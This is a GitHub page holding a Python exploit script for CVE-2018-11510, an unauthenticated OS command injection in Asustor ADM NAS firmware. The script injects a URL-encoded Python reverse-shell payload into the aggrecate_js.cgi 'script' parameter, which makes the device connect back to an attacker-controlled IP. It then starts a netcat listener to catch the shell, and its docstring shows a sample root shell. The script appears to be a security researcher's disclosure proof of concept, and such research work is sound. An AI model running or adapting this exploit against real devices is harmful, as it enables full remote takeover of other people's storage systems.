Permalink
Cannot retrieve contributors at this time
Name already in use
A tag already exists with the provided branch name. Many Git commands accept both tag and branch names, so creating this branch may cause unexpected behavior. Are you sure you want to create this branch?
CVE-2018-11510/admex.py /
Go to fileThis commit does not belong to any branch on this repository, and may belong to a fork outside of the repository.
84 lines (74 sloc)
3.29 KB
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/usr/bin/python | |
| """ | |
| CVE-2018-11510: http://cve.mitre.org/cgi-bin/cvename.cgi?name=2018-11510 | |
| This exploit takes advantage an unauthenticated os command injection discovered by Kyle Lovette | |
| if exploitation occurs successfully, a root shell is granted :) | |
| Authors: matthew fulton and Kyle Lovett | |
| Date: 27 May 2018 | |
| Background: Both Kyle and I found a number of vulnerabilities that we had independently reported | |
| to Asustor that Asustor hasn't acknowledge nor apparenlty fixed. | |
| After a twitter communication Kyle was kind enough to share a few details | |
| exploit created on MacOS system, python 2.7.10, may port to metasploit module soon | |
| Matthews-MBP:remoteunauth matt$ python admex.py -t 192.168.1.82 | |
| exploit for an unauthenticated OS command injection vulnerability that effects | |
| Asustor ADM 3.1.2.RHG1 and below, leads to complete compromise | |
| authors: Matthew Fulton (@haqur) & Kyle Lovett (@SquirrelBuddha) | |
| starting netcat listener on port 1234 | |
| /bin/sh: can't access tty; job control turned off | |
| /volume0/usr/builtin/webman/portal/apis # uname -a;id | |
| /bin/sh: can't access tty; job control turned off | |
| /volume0/usr/builtin/webman/portal/apis # Linux AS6202T-961F 4.4.24 #1 SMP Mon Mar 26 02:57:14 CST 2018 x86_64 GNU/Linux | |
| uid=0(root) gid=0(root) groups=0(root) | |
| """ | |
| import sys, threading, time, os, subprocess | |
| import urllib2 | |
| import ssl | |
| import argparse | |
| class exploit(object): | |
| def __init__(self,interval=1): | |
| self.target = args.target | |
| self.rport = args.port | |
| self.lport = args.lport | |
| self.remote = args.remote | |
| self.interval = interval | |
| thread = threading.Thread(target=self.run, args=()) | |
| thread.daemon = True | |
| thread.start() | |
| def run(self): | |
| #ignore ssl warnings | |
| ctx = ssl.create_default_context() | |
| ctx.check_hostname = False | |
| ctx.verify_mode = ssl.CERT_NONE | |
| while True: | |
| try: | |
| turl="https://"+self.target+":"+self.rport+"/portal/apis/aggrecate_js.cgi?script=" \ | |
| "launcher%22%26python%20-c%20%27import%20socket%2Csubprocess%2Cos%3Bs%3Dsocket.socket" \ | |
| "(socket.AF_INET%2Csocket.SOCK_STREAM)%3Bs.connect((%22"+self.remote+"%22%2C"+self.lport+"))" \ | |
| "%3Bos.dup2(s.fileno()%2C0)%3B%20os.dup2(s.fileno()%2C1)%3B%20os.dup2(s.fileno()%2C2)%3Bp%3D" \ | |
| "subprocess.call(%5B%22%2Fbin%2Fsh%22%2C%22-i%22%5D)%3B%27%22" | |
| response=urllib2.urlopen(turl,context=ctx) | |
| time.sleep(self.interval) | |
| except urllib2.URLError as e: | |
| print "Something is wrong:|" | |
| print e | |
| os._exit(1) | |
| def revShell(): | |
| print "starting netcat listener on port "+args.lport | |
| cmd = "nc -lv {0}".format(args.lport) | |
| os.system(cmd) | |
| def main(): | |
| print """exploit for an unauthenticated OS command injection vulnerability that effects | |
| Asustor ADM 3.1.2.RHG1 and below, leads to complete compromise | |
| authors: Matthew Fulton (@haqur) & Kyle Lovett (@SquirrelBuddha)""" | |
| goexploit = exploit() | |
| revShell() | |
| if __name__ == '__main__': | |
| Help = """exploitation of a OS command injection bug that effects Asustor ADM, leads to complete compromise | |
| authors: Matthew Fulton (@haqur) & Kyle Lovett (@SquirrelBuddha)""" | |
| parser=argparse.ArgumentParser(description=help) | |
| parser.add_argument('--target', '-t', default="192.168.1.82", help="Target IP", required=True) | |
| parser.add_argument('--port', '-p', default="8001") | |
| parser.add_argument('--lport', '-l', default="1234") | |
| parser.add_argument('--remote','-r', default="192.168.1.253") | |
| args = parser.parse_args() | |
| main() |